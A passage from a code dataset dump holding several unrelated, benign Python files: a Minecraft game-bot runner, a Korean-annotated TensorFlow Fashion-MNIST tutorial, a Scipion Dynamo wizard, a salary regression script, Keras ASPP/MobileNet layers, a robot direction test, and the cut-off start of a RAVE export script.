Projects/gameBot/recording output/minecraft_gameplay.avi'\r\nprocessed_csv = 'D:/Python Projects/gameBot/processed output/minecraft_gameplay.csv'\r\nprocessed_avi = 'D:/Python Projects/gameBot/processed output/minecraft_gameplay.avi'\r\n\r\nminecraft_all_keys = ('1', '2', '3', '4', '5', '6', '7', '8', '9',\r\n 'space', 'w', 'a', 's', 'd', 'e', 
'shift',\r\n 'lmouse', 'rmouse')\r\n\r\ntree_farm_keys = ('1', '2', '3',\r\n # 'w', 'a', 's', 'd',\r\n # 'e', 'shift',\r\n 'lmouse', 'rmouse')\r\n\r\nbasic_keys = ('w', 'a', 's', 'd', 'lmouse', 'rmouse')\r\nwasd = ('w', 'a', 's', 'd')\r\n\r\n\r\ndef generate_column_names(keys):\r\n cols = []\r\n for key in keys:\r\n cols.append(key + '_press')\r\n cols.append(key + '_release')\r\n return cols\r\n\r\n\r\ndef build_dataset(record_seconds):\r\n recorder = Recorder(recorded_csv, recorded_avi, tree_farm_keys)\r\n recorder.run(minecraft_json, record_seconds)\r\n recorder.quit()\r\n print('successfully recorded video')\r\n\r\n efr = EmptyFrameRemover(minecraft_json)\r\n # Clean up json read/write in EmptyFrameRemover\r\n efr.remove_empty_frames(processed_csv, processed_avi, .05, generate_column_names(tree_farm_keys))\r\n print('successfully removed empty frames')\r\n\r\n\r\ndef build_model():\r\n km = KeyModel(json_address=minecraft_json,\r\n initial_learn_rate=.01,\r\n epochs=10,\r\n batch_size=48,\r\n keys=generate_column_names(tree_farm_keys),\r\n mouse=True)\r\n\r\n km.build_model(model_address=\"D:/Python Projects/gameBot/models/tree_farm\", batch_length_multiplier=3)\r\n\r\n\r\ndef make_predictions():\r\n predictor = Predictor(model_address='D:/Python Projects/gameBot/models/tree_farm',\r\n json_address=minecraft_json)\r\n predictor.run_predictions()\r\n\r\n\r\nmake_predictions()","repo_name":"retropleinad/game-bot","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"1820763070","text":"# 기본 분류: 의류 이미지 분류\n\n# 이 튜토리얼에서는 운동화나 셔츠 같은 옷 이미지를 분류하는 신경망 모델을 훈련합니다.\n# 상세 내용을 모두 이해하지 못해도 괜찮습니다. \n# 여기서는 완전한 텐서플로(TensorFlow) 프로그램을 빠르게 살펴 보겠습니다. \n# 자세한 내용은 앞으로 배우면서 더 설명합니다.\n\n# 여기에서는 텐서플로 모델을 만들고 훈련할 수 있는 고수준 API인 tf.keras를 사용합니다.\n\n# TensorFlow and tf.keras\nimport tensorflow as tf\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(tf.__version__)\n\n# 패션 MNIST 데이터셋 임포트하기\n# 10개의 범주(category)와 70,000개의 흑백 이미지로 구성된 패션 MNIST 데이터셋을 사용하겠습니다.\n# 이미지는 해상도(28x28 픽셀)가 낮고 다음처럼 개별 옷 품목을 나타냅니다:\n\n# 패션 MNIST는 컴퓨터 비전 분야의 \"Hello, World\" 프로그램격인 고전 MNIST 데이터셋을 \n# 대신해서 자주 사용됩니다.\n# MNIST 데이터셋은 손글씨 숫자(0, 1, 2 등)의 이미지로 이루어져 있습니다. \n# 여기서 사용하려는 옷 이미지와 동일한 포맷입니다.\n\n# 패션 MNIST는 일반적인 MNIST 보다 조금 더 어려운 문제이고 다양한 예제를 만들기 위해 \n# 선택했습니다. \n# 두 데이터셋은 비교적 작기 때문에 알고리즘의 작동 여부를 확인하기 위해 사용되곤 합니다.\n# 코드를 테스트하고 디버깅하는 용도로 좋습니다.\n\n# 여기에서 60,000개의 이미지를 사용하여 네트워크를 훈련하고 10,000개의 이미지를 \n# 사용하여 네트워크에서 이미지 분류를 학습한 정도를 평가합니다. 
\n# TensorFlow에서 직접 Fashion MNIST에 액세스할 수 있습니다.\n# TensorFlow에서 직접 Fashion MNIST 데이터를 가져오고 로드합니다.\n\nfashion_mnist = tf.keras.datasets.fashion_mnist\n\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n\n# load_data() 함수를 호출하면 네 개의 넘파이(NumPy) 배열이 반환됩니다:\n# - train_images와 train_labels 배열은 모델 학습에 사용되는 훈련 세트입니다.\n# - test_images와 test_labels 배열은 모델 테스트에 사용되는 테스트 세트입니다.\n# 이미지는 28x28 크기의 넘파이 배열이고 픽셀 값은 0과 255 사이입니다.\n# 레이블(label)은 0에서 9까지의 정수 배열입니다.\n# 이 값은 이미지에 있는 옷의 클래스(class)를 나타냅니다:\n\n# 각 이미지는 하나의 레이블에 매핑되어 있습니다.\n# 데이터셋에 클래스 이름이 들어있지 않기 때문에 나중에 이미지를 출력할 때 사용하기 위해 \n# 별도의 변수를 만들어 저장합니다:\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n               'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# 데이터 탐색\n# 모델을 훈련하기 전에 데이터셋 구조를 살펴보죠.\n# 다음 코드는 훈련 세트에 60,000개의 이미지가 있다는 것을 보여줍니다.\n# 각 이미지는 28x28 픽셀로 표현됩니다:\n\ntrain_images.shape\n# (60000, 28, 28)\n\n# 비슷하게 훈련 세트에는 60,000개의 레이블이 있습니다:\nlen(train_labels)\n# 60000\n\n# 각 레이블은 0과 9사이의 정수입니다:\ntrain_labels\n# array([9, 0, 0, ..., 3, 0, 5], dtype=uint8)\n\n# 테스트 세트에는 10,000개의 이미지가 있습니다. 이 이미지도 28x28 픽셀로 표현됩니다:\ntest_images.shape\n# (10000, 28, 28)\n\n# 테스트 세트는 10,000개의 이미지에 대한 레이블을 가지고 있습니다:\nlen(test_labels)\n# 10000\n\n# 데이터 전처리\n# 네트워크를 훈련하기 전에 데이터를 전처리해야 합니다.\n# 훈련 세트에 있는 첫 번째 이미지를 보면 픽셀 값의 범위가 0~255 사이라는 것을 알 수 있습니다:\n\nplt.figure()\nplt.imshow(train_images[0])\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\n# 신경망 모델에 주입하기 전에 이 값의 범위를 0~1 사이로 조정하겠습니다.\n# 이렇게 하려면 255로 나누어야 합니다.\n# 훈련 세트와 테스트 세트를 동일한 방식으로 전처리하는 것이 중요합니다:\n\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n# 훈련 세트에서 처음 25개 이미지와 그 아래 클래스 이름을 출력해 보죠.\n# 데이터 포맷이 올바른지 확인하고 네트워크 구성과 훈련할 준비를 마칩니다.\nplt.figure(figsize=(10,10))\nfor i in range(25):\n    plt.subplot(5,5,i+1)\n    plt.xticks([])\n    plt.yticks([])\n    plt.grid(False)\n    plt.imshow(train_images[i], cmap=plt.cm.binary)\n    plt.xlabel(class_names[train_labels[i]])\n    plt.subplot(5,5,i+1).xaxis.label.set_color('gray')\nplt.show()\n\n# 모델 구성\n# 신경망 모델을 만들려면 모델의 층을 구성한 다음 모델을 컴파일합니다.\n\n# 층 설정\n# 신경망의 기본 빌딩 블록은 레이어 입니다.\n# 레이어는 레이어에 공급된 데이터로부터 표현을 추출합니다.\n# 이러한 표현은 당면한 문제에 의미가 있어야 합니다.\n\n# 대부분 딥러닝은 간단한 층을 연결하여 구성됩니다.\n# tf.keras.layers.Dense와 같은 층들의 가중치(parameter)는 훈련하는 동안 학습됩니다.\n\nmodel = tf.keras.Sequential([\n    tf.keras.layers.Flatten(input_shape=(28, 28)),\n    tf.keras.layers.Dense(128, activation='relu'),\n    tf.keras.layers.Dense(10)\n])\n\n# 이 네트워크의 첫 번째 층인 tf.keras.layers.Flatten은 2차원 배열(28 x 28 픽셀)의\n# 이미지 포맷을 28 * 28 = 784 픽셀의 1차원 배열로 변환합니다.\n# 이 층은 이미지에 있는 픽셀의 행을 펼쳐서 일렬로 늘립니다.\n# 이 층에는 학습되는 가중치가 없고 데이터를 변환하기만 합니다.\n\n# 픽셀을 펼친 후에는 두 개의 tf.keras.layers.Dense 층이 연속되어 연결됩니다.\n# 이 층을 밀집 연결(densely-connected) 또는 완전 연결(fully-connected) 층이라고 부릅니다.\n# 첫 번째 Dense 층은 128개의 노드(또는 뉴런)를 가집니다.\n# 두 번째 (마지막) 층은 10개의 노드의 소프트맥스(softmax) 층입니다.\n# 이 층은 10개의 확률을 반환하고 반환된 값의 전체 합은 1입니다.\n# 각 노드는 현재 이미지가 10개 클래스 중 하나에 속할 확률을 출력합니다.\n\n# 모델 컴파일\n# 모델을 훈련할 준비가 되기 전에 몇 가지 설정이 더 필요합니다.\n# 다음은 모델의 컴파일 단계에서 추가됩니다.\n\n# - 손실 함수(Loss function) - 훈련 중 모델이 얼마나 정확한지 측정합니다.\n#   모델을 올바른 방향으로 \"조정\"하려면 이 함수를 최소화해야 합니다.\n# - 옵티마이저(Optimizer) - 모델이 인식하는 데이터와 해당 손실 함수를 기반으로\n#   모델이 업데이트되는 방식입니다.\n# - 메트릭(Metrics) - 훈련 및 테스트 단계를 모니터링하는 데 사용됩니다.\n#   다음 예에서는 올바르게 분류된 이미지의 비율인 정확도를 사용합니다.\n\nmodel.compile(optimizer='adam',\n              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n              metrics=['accuracy'])\n\n# 모델 훈련\n# 신경망 모델을 훈련하려면 다음 단계가 필요합니다.\n# 1. 훈련 데이터를 모델에 주입합니다-이 예에서는 train_images와 train_labels 배열입니다.\n# 2. 모델이 이미지와 레이블을 매핑하는 방법을 배웁니다.\n# 3. 
테스트 세트에 대한 모델의 예측을 만듭니다-이 예에서는 test_images 배열입니다.\n# 이 예측이 test_labels 배열의 레이블과 맞는지 확인합니다.\n# 4. 예측이 test_labels 배열의 레이블과 일치하는지 확인합니다.\n\n# 모델 피드\n# 훈련을 시작하려면 model.fit 메서드를 호출합니다.\n# 모델을 훈련 데이터에 \"맞추기(fit)\" 때문에 이렇게 불립니다.\n\nmodel.fit(train_images, train_labels, epochs=10)\n\n# Epoch 1/10\n# 1875/1875 [==============================] - 4s 1ms/step - loss: 0.4997 - accuracy: 0.8245\n# Epoch 2/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.3711 - accuracy: 0.8664\n# Epoch 3/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.3360 - accuracy: 0.8767\n# Epoch 4/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.3120 - accuracy: 0.8850\n# Epoch 5/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2943 - accuracy: 0.8912\n# Epoch 6/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2806 - accuracy: 0.8963\n# Epoch 7/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2676 - accuracy: 0.8994\n# Epoch 8/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2573 - accuracy: 0.9037\n# Epoch 9/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2469 - accuracy: 0.9080\n# Epoch 10/10\n# 1875/1875 [==============================] - 2s 1ms/step - loss: 0.2374 - accuracy: 0.9107\n# \n\n# 모델이 훈련되면서 손실과 정확도 지표가 출력됩니다.\n# 이 모델은 훈련 세트에서 약 0.88(88%) 정도의 정확도를 달성합니다.\n\n# 정확도 평가\n# 다음으로, 모델이 테스트 데이터세트에서 작동하는 방식을 비교합니다.\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\nprint('\\nTest accuracy:', test_acc)\n\n# 313/313 - 0s - loss: 0.3316 - accuracy: 0.8832 - 388ms/epoch - 1ms/step\n# Test accuracy: 0.8831999897956848\n\n# 테스트 세트의 정확도가 훈련 세트의 정확도보다 조금 낮습니다.\n# 훈련 세트의 정확도와 테스트 세트의 정확도 사이의 차이는 과대적합(overfitting) 때문입니다.\n# 과대적합은 머신러닝 모델이 훈련 데이터보다 새로운 데이터에서 성능이 낮아지는 현상을 말합니다.\n# - 과대적합 시연\n# - 과대적합을 방지하기 위한 전략\n\n# 예측하기\n# 훈련된 모델을 사용하여 일부 이미지에 대한 예측을 수행할 수 있습니다.\n# 모델의 선형 출력, 로짓. 소프트맥스 레이어를 연결하여 로짓을 해석하기 쉬운 확률로 변환합니다.\n\nprobability_model = tf.keras.Sequential([model, \n tf.keras.layers.Softmax()])\npredictions = probability_model.predict(test_images)\n\n# 여기서는 테스트 세트에 있는 각 이미지의 레이블을 예측했습니다. 
첫 번째 예측을 확인해 보죠:\npredictions[0]\n# array([4.5523601e-07, 2.5354547e-07, 4.1117669e-08, 5.4440511e-11,\n# 3.3533016e-09, 1.0785974e-03, 1.3920819e-06, 7.1124728e-03,\n# 1.5985714e-05, 9.9179077e-01], dtype=float32)\n\n# 이 예측은 10개의 숫자 배열로 나타납니다.\n# 이 값은 10개의 옷 품목에 상응하는 모델의 신뢰도(confidence)를 나타냅니다.\n# 가장 높은 신뢰도를 가진 레이블을 찾아보죠:\nnp.argmax(predictions[0])\n# 9\n\n# 모델은 이 이미지가 앵클 부츠(class_name[9])라고 가장 확신하고 있습니다.\n# 이 값이 맞는지 테스트 레이블을 확인해 보죠:\ntest_labels[0]\n# 9\n\n# 10개 클래스에 대한 예측을 모두 그래프로 표현해 보겠습니다:\ndef plot_image(i, predictions_array, true_label, img):\n true_label, img = true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100*np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n true_label = true_label[i]\n plt.grid(False)\n plt.xticks(range(10))\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n# 예측 확인\n# 훈련된 모델을 사용하여 일부 이미지에 대한 예측을 수행할 수 있습니다.\n\n# 0번째 원소의 이미지, 예측, 신뢰도 점수 배열을 확인해 보겠습니다.\ni = 0\nplt.figure(figsize=(6,3))\nplt.subplot(1,2,1)\nplot_image(i, predictions[i], test_labels, test_images)\nplt.subplot(1,2,2)\nplot_value_array(i, predictions[i], test_labels)\nplt.show()\n\ni = 12\nplt.figure(figsize=(6,3))\nplt.subplot(1,2,1)\nplot_image(i, predictions[i], test_labels, test_images)\nplt.subplot(1,2,2)\nplot_value_array(i, predictions[i], test_labels)\nplt.show()\n\n# 몇 개의 이미지의 예측을 출력해 보죠.\n# 올바르게 예측된 레이블은 파란색이고 잘못 예측된 레이블은 빨강색입니다.\n# 숫자는 예측 레이블의 신뢰도 퍼센트(100점 만점)입니다.\n# 신뢰도 점수가 높을 때도 잘못 예측할 수 있습니다.\n\n# Plot the first X test images, their predicted labels, and the true labels.\n# Color correct predictions in blue and incorrect predictions in red.\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows*num_cols\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\nfor i in range(num_images):\n plt.subplot(num_rows, 2*num_cols, 2*i+1)\n plot_image(i, predictions[i], test_labels, test_images)\n plt.subplot(num_rows, 2*num_cols, 2*i+2)\n plot_value_array(i, predictions[i], test_labels)\nplt.tight_layout()\nplt.show()\n\n# 훈련된 모델 사용하기\n# 마지막으로 훈련된 모델을 사용하여 한 이미지에 대한 예측을 만듭니다.\n\n# Grab an image from the test dataset.\nimg = test_images[1]\nprint(img.shape)\n# (28, 28)\n\n# tf.keras 모델은 한 번에 샘플의 묶음 또는 배치(batch)로 예측을 만드는데 최적화되어 있습니다.\n# 하나의 이미지를 사용할 때에도 2차원 배열로 만들어야 합니다:\n\n# Add the image to a batch where it's the only member.\nimg = (np.expand_dims(img,0))\nprint(img.shape)\n\n# 이제 이 이미지의 예측을 만듭니다:\npredictions_single = probability_model.predict(img)\nprint(predictions_single)\n# [[1.3309498e-05 5.3667986e-12 9.9919826e-01 7.4546870e-12 5.3125247e-04\n# 9.5022568e-10 2.5713479e-04 8.0847931e-13 2.6048724e-10 2.2007651e-13]]\n\nplot_value_array(1, predictions_single[0], test_labels)\n_ = plt.xticks(range(10), class_names, rotation=45)\nplt.show()\n\n# tf.keras.Model.predict는 데이터 배치의 각 이미지에 대해 하나의 목록씩 목록의 목록을 반환합니다.\n# 배치에서 (유일한) 이미지에 대한 예측을 가져옵니다.\nnp.argmax(predictions_single[0])\n# 2\n\n# 예상과 같이 모델이 레이블을 예측합니다.\n\n# MIT License\n#\n# Copyright (c) 2017 François Chollet\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software 
and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\n\n","repo_name":"astroeye/autoencoder","sub_path":"01_study/Tensorflow/121_Basic_image_lassification.py","file_name":"121_Basic_image_lassification.py","file_ext":"py","file_size_in_byte":16185,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"21105999915","text":"# **************************************************************************\n# *\n# * Authors: David Herreros Calero (dherreros@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\nfrom dynamo.protocols.protocol_extraction import OTHER\nfrom pwem.wizards import EmWizard\nfrom dynamo.protocols import DynamoExtraction, DynamoModelWorkflow\n\n\n# =============================================================================\n# EXTRACTION\n# =============================================================================\n\n\nclass DynamoExtractionWizard(EmWizard):\n _targets = [(DynamoExtraction, ['boxSize'])]\n\n def show(self, form):\n binFactor = 1\n DynamoExtractProt = form.protocol\n inputCoordinates = DynamoExtractProt.inputCoordinates.get()\n tomoSource = DynamoExtractProt.tomoSource.get()\n if not inputCoordinates:\n print('You must specify input coordinates')\n return\n\n boxSize = inputCoordinates.getBoxSize()\n if not boxSize:\n print('These coordinates do not have box size. 
Please enter box size manually.')\n            return\n\n        if tomoSource == OTHER:\n            inTomos = DynamoExtractProt.inputTomograms.get()\n            if not inTomos:\n                print('The tomograms for the subtomogram extraction must be specified if the selected '\n                      'tomogram source is \"Other\"')\n                return\n            coordsSRate = inputCoordinates.getSamplingRate()\n            tomosSRate = inTomos.getSamplingRate()\n            binFactor = coordsSRate / tomosSRate\n\n        boxSize = round(boxSize * binFactor)\n        form.setVar('boxSize', boxSize)\n\n\n# =============================================================================\n# MODEL WORKFLOW\n# =============================================================================\n\nclass DynamoModelWorkflowWizard(EmWizard):\n    _targets = [(DynamoModelWorkflow, ['boxSize'])]\n\n    def show(self, form):\n        DynamoModelWorkflowProt = form.protocol\n        inputMeshes = DynamoModelWorkflowProt.inputMeshes.get()\n        if not inputMeshes:\n            print('You must specify input meshes')\n            return\n\n        aux = inputMeshes.getBoxSize()\n        if aux % 2 != 0:\n            aux += 1\n        boxSize = aux\n        if not boxSize:\n            print('These coordinates do not have box size. Please enter box size manually.')\n            return\n\n        form.setVar('boxSize', boxSize)","repo_name":"scipion-em/scipion-em-dynamo","sub_path":"dynamo/wizards.py","file_name":"wizards.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"21895294330","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('Salary_Data.csv')\r\nX = df.iloc[:,0]\r\ny = df.iloc[:,1]\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=1/3.0, random_state=0)\r\nX_train = X_train.values.reshape(-1,1)\r\n\r\nfrom sklearn import linear_model\r\nregressor = linear_model.LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n# fig = plt.figure(figsize=(12,8))\r\nplt.scatter(X_train, y_train)\r\nplt.plot(np.arange(0,12,0.3), regressor.predict(np.arange(0,12,0.3).reshape(-1,1)), color='red')\r\nplt.title('Salary vs Experience')\r\nplt.xlabel('Years of Experience')\r\nplt.ylabel('Salary')\r\nplt.show()","repo_name":"Snakesystem/Notebook","sub_path":"educba/1_Normal_Linear_Regretion.py","file_name":"1_Normal_Linear_Regretion.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"10799880992","text":"from keras.layers import *\nimport keras.backend as K\nimport tensorflow as tf\nfrom keras.utils import conv_utils  # needed for the normalize_* helpers below; its exact location varies across Keras versions\nfrom keras_applications.mobilenet import relu6\nclass BilinearUpsampling(Layer):\n    def __init__(self, upsampling=(2, 2), data_format=None, **kwargs):\n        super(BilinearUpsampling, self).__init__(**kwargs)\n        self.data_format = conv_utils.normalize_data_format(data_format)\n        self.upsampling = conv_utils.normalize_tuple(upsampling, 2, 'size')\n        self.input_spec = InputSpec(ndim=4)\n    def compute_output_shape(self, input_shape):\n        height = self.upsampling[0] * \\\n            input_shape[1] if input_shape[1] is not None else None\n        width = self.upsampling[1] * \\\n            input_shape[2] if input_shape[2] is not None else None\n        return (input_shape[0],\n                height,\n                width,\n                input_shape[3])\n    def call(self, inputs):\n        return K.tf.image.resize_bilinear(inputs, (int(inputs.shape[1]*self.upsampling[0]),\n                                                   int(inputs.shape[2]*self.upsampling[1])))\n    def get_config(self):\n        config = {'size': self.upsampling,\n                  'data_format': self.data_format}\n        base_config = 
super(BilinearUpsampling, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\ndef aspp(x,input_shape,out_stride):\n b0=Conv2D(128,(1,1),kernel_initializer='he_normal',padding=\"same\",use_bias=True)(x)\n b0=BatchNormalization()(b0)\n b0=Activation(\"relu\")(b0)\n\n b1=Conv2D(128,(3,3),kernel_initializer='he_normal',dilation_rate=(6,6),padding=\"same\",use_bias=True)(x)\n b1=BatchNormalization()(b1)\n b1=Activation(\"relu\")(b1)\n\n b2=Conv2D(128,(3,3),kernel_initializer='he_normal',dilation_rate=(12,12),padding=\"same\",use_bias=True)(x)\n b2=BatchNormalization()(b2)\n b2=Activation(\"relu\")(b2)\n\n b3=Conv2D(128,(3,3),kernel_initializer='he_normal',dilation_rate=(18,18),padding=\"same\",use_bias=True)(x)\n b3=BatchNormalization()(b3)\n b3=Activation(\"relu\")(b3)\n\n out_shape=int(input_shape[0]/out_stride)\n b4=MaxPooling2D(pool_size=(out_shape,out_shape))(x)\n b4=Conv2D(128,(1,1),kernel_initializer='he_normal',padding=\"same\",use_bias=True)(b4)\n b4=BatchNormalization()(b4)\n b4=Activation(\"relu\")(b4)\n b4=BilinearUpsampling((out_shape,out_shape))(b4)\n\n x=Concatenate()([b4,b0,b1,b2,b3])\n return x\n\ndef aspp_plus(x,input_shape,out_stride):\n b0=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(x)\n b0=BatchNormalization()(b0)\n b0=Activation(relu6)(b0)\n\n b1=DepthwiseConv2D((3,3),dilation_rate=(6,6),padding=\"same\",use_bias=True)(x)\n b1=BatchNormalization()(b1)\n b1=Activation(relu6)(b1)\n b1=Conv2D(256,(1,1),padding=\"same\",use_bias=False)(b1)\n b1=BatchNormalization()(b1)\n b1=Activation(relu6)(b1)\n\n b2=DepthwiseConv2D((3,3),dilation_rate=(12,12),padding=\"same\",use_bias=True)(x)\n b2=BatchNormalization()(b2)\n b2=Activation(relu6)(b2)\n b2=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(b2)\n b2=BatchNormalization()(b2)\n b2=Activation(relu6)(b2)\n\n b3=DepthwiseConv2D((3,3),dilation_rate=(18,18),padding=\"same\",use_bias=True)(x)\n b3=BatchNormalization()(b3)\n b3=Activation(relu6)(b3)\n b3=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(b3)\n b3=BatchNormalization()(b3)\n b3=Activation(relu6)(b3)\n\n out_shape=int(input_shape[0]/out_stride)\n b4=AveragePooling2D(pool_size=(out_shape,out_shape))(x)\n b4=Conv2D(256,(1,1),padding=\"same\",use_bias=True)(b4)\n b4=BatchNormalization()(b4)\n b4=Activation(relu6)(b4)\n b4=BilinearUpsampling((out_shape,out_shape))(b4)\n\n x=Concatenate()([b4,b0,b1,b2,b3])\n return x\n\ndef _make_divisible(v,divisor,min_value=None):\n if min_value is None :\n min_value =divisor\n new_v = max(min_value,int(v+divisor/2)// divisor*divisor)\n if new_v < 0.9*v :\n new_v += divisor\n return new_v\n\ndef _conv_block(inputs, filters, kernel, strides):\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n x = Conv2D(filters,kernel,padding=\"same\",strides=strides)(inputs)\n return Activation(relu6)(x)\n\ndef _bottleneck(inputs,filters,kernel,t,alpha,s,r=False):\n channel_axis = 1 if K.image_data_format() =='channels_first' else -1\n tchannel = K.int_shape(inputs)[channel_axis]*t\n cchannel = int(filters * alpha)\n x = _conv_block(inputs,tchannel,(1,1),(1,1))\n x = DepthwiseConv2D(kernel,strides=(s,s),depth_multiplier=1,padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n x = Activation(relu6)(x)\n x = Conv2D(cchannel, (1,1), strides=(1,1), padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n if r :\n x = add([x,inputs])\n return x\n\ndef _inverted_residual_block(inputs,filters,kernel,t,alpha,strides,n):\n x = _bottleneck(inputs,filters,kernel,t,alpha,strides)\n for i 
in range(1,n):\n x = _bottleneck(x,filters,kernel,t,alpha,1,True)\n return x","repo_name":"grant111924/Simplified_Network","sub_path":"model/keras_fun.py","file_name":"keras_fun.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"11429271366","text":"import threading\nimport time\n\nfrom lps.commands import Commands\nfrom lps.constants import Modes\nfrom lps.debugger import Debugger, INFO\n\n\nclass VictimDirectionTest:\n def __init__(self, tinbot, debugger=None):\n self.debugger = debugger or Debugger.current\n\n self.tinbot = tinbot\n\n self.thread = None\n self.iterations = None\n self.result = None\n self.done = threading.Event()\n\n def start(self, iterations=50):\n self.iterations = iterations\n self.result = []\n\n self.thread = threading.Thread(target=self.run)\n self.thread.start()\n\n def run(self):\n self.tinbot.package_event += self.on_package\n self.debugger.print_message('Starting Victim Direction Test', INFO)\n self.tinbot.set_mode(Modes.VICDIR)\n for iteration in range(self.iterations):\n time.sleep(0.5)\n self.done.clear()\n self.tinbot.start()\n self.done.wait()\n self.tinbot.reset()\n self.tinbot.package_event -= self.on_package\n\n def on_package(self, device, source, target, command, payload):\n if command != Commands.VICTIM_PHI:\n return\n x, y, phi = Commands.VICTIM_PHI.decode(payload)\n self.result.append((phi, self.tinbot.victim_phi))\n self.done.set()\n","repo_name":"Schwenger/TinBots","sub_path":"implementation/lps/lps/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"9736570206","text":"import torch\n\ntorch.set_grad_enabled(False)\nimport os\n\nimport cached_conv as cc\nimport gin\nimport torch.nn as nn\nfrom absl import app, flags\nfrom effortless_config import Config\n\nimport rave\n\nflags.DEFINE_string('run', default=None, required=True, help='Run to export')\nFLAGS = flags.FLAGS\n\n\ndef main(argv):\n gin.parse_config_file(os.path.join(FLAGS.run, \"config.gin\"))\n checkpoint = rave.core.search_for_run(FLAGS.run)\n\n print(f\"using {checkpoint}\")\n\n pretrained = rave.RAVE()\n pretrained.load_state_dict(torch.load(checkpoint)[\"state_dict\"])\n pretrained.eval()\n\n for m in pretrained.modules():\n if hasattr(m, \"weight_g\"):\n nn.utils.remove_weight_norm(m)\n\n def recursive_replace(model: nn.Module):\n for name, child in model.named_children():\n if isinstance(child, cc.convs.Conv1d):\n conv = nn.Conv1d(\n child.in_channels,\n child.out_channels,\n child.kernel_size,\n child.stride,\n child._pad[0],\n child.dilation,\n child.groups,\n child.bias,\n )\n conv.weight.data.copy_(child.weight.data)\n if conv.bias is not None:\n conv.bias.data.copy_(child.bias.data)\n setattr(model, name, conv)\n elif 